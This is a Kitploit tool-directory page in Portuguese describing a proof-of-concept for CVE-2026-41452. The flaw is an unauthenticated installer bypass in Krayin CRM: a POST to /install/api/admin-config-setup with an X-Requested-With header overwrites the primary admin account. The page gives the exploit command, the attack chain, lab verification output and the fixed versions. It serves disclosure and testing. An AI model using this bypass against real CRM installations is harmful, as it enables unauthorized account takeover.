Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41452-PoC — CVE-2026-41452 — bypass do instalador não autenticado do Krayin CRM (X-Requested-With) → tomada de controle de administrador. Verificado: sobrescrita + login na 2.2.4, bloqueado na 2.2.5 | Kitploit
Ferramentas/GitHubGitHub/boreas37/cve-2026-41452-poc
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubboreas37/cve-2026-41452-poc

CVE-2026-41452-PoC

CVE-2026-41452 — bypass do instalador não autenticado do Krayin CRM (X-Requested-With) → tomada de controle de administrador. Verificado: sobrescrita + login na 2.2.4, bloqueado na 2.2.5

Ver Repositório
414há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41452 — Bypass de Autenticação no Instalador do Krayin CRM → Assunção de Conta de Admin

CVSS 9.8 (Crítico) · CWE-287 / CWE-306 · Writeup da Jiva · VulnCheck

Resumo

O instalador do Krayin CRM expõe POST /install/api/admin-config-setup (além de run-migration, run-seeder) sem proteção CSRF (grupo withoutMiddleware('web')). O middleware global CanInstall só bloqueia a rota para requisições não AJAX:

// app/Http/Middleware/CanInstall.php
if ($this->isAlreadyInstalled() && ! $request->ajax()) {
    return redirect()->route('admin.dashboard');
}

O envio de X-Requested-With: XMLHttpRequest ignora completamente a verificação. O controller então executa updateOrInsert no administrador primário embutido no código (ID do usuário=1) com nome/email/senha fornecidos pelo atacante (role_id=1, status=1) → assunção total de administrador sem autenticação em uma instância já instalada.

Versões afetadas: ≤ 2.2.0 e 2.2.4 (regressão). Corrigido: 2.2.1 (e4eb96f5), regressão em 2.2.4 (6a7bc4cc), corrigido novamente em 2.2.5 (ea4919a8). master ainda estava vulnerável no momento da pesquisa.

Exploit

python3 poc_cve-2026-41452.py http://TARGET newadmin [email protected] 'NewPass@123'

Cadeia:

  1. Linha de base: POST não AJAX → bloqueado (redirecionamento 302) — prova que o middleware funciona para requisições normais
  2. POST AJAX X-Requested-With: XMLHttpRequest → HTTP 200 1 → admin (id=1) sobrescrito
  3. Login em /admin/login com as novas credenciais → redirecionamento para /admin/dashboard
  4. O dashboard é renderizado → assunção confirmada

Verificação (2026-08-12, laboratório Docker, ARM64)

[0] NON-AJAX POST -> HTTP 302 (blocked by CanInstall)        [OK control]
[1] AJAX POST /install/api/admin-config-setup -> HTTP 200 '1' [OK overwrite]
[2] login [email protected] -> HTTP 302 /admin/dashboard          [OK]
[3] GET /admin/dashboard -> HTTP 200 (full dashboard)          [OK]
=== VERDICT: CVE-2026-41452 EXPLOITABLE ===

Comparação com a build corrigida: com os arquivos da v2.2.5, o mesmo POST AJAX → HTTP 403 (bloqueado).

Impacto

Qualquer instalação do Krayin CRM acessível publicamente (v2.2.4 ou ≤2.2.0) pode ser totalmente assumida por um atacante não autenticado em uma única requisição. Sem CSRF, sem credenciais, sem interação necessária.

Referências

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41452
  • Writeup da Jiva Security: https://jivasecurity.com/writeups/krayin-installer-bypass-account-takeover-cve-2026-41452
  • Advisory da VulnCheck: https://www.vulncheck.com/advisories/krayin-crm-missing-authentication-via-install-api-admin-config-setup
  • Correção: ea4919a8 (v2.2.5) · Regressão: 6a7bc4cc (v2.2.4) · Primeira correção: e4eb96f5 (v2.2.1)
Baixar ferramenta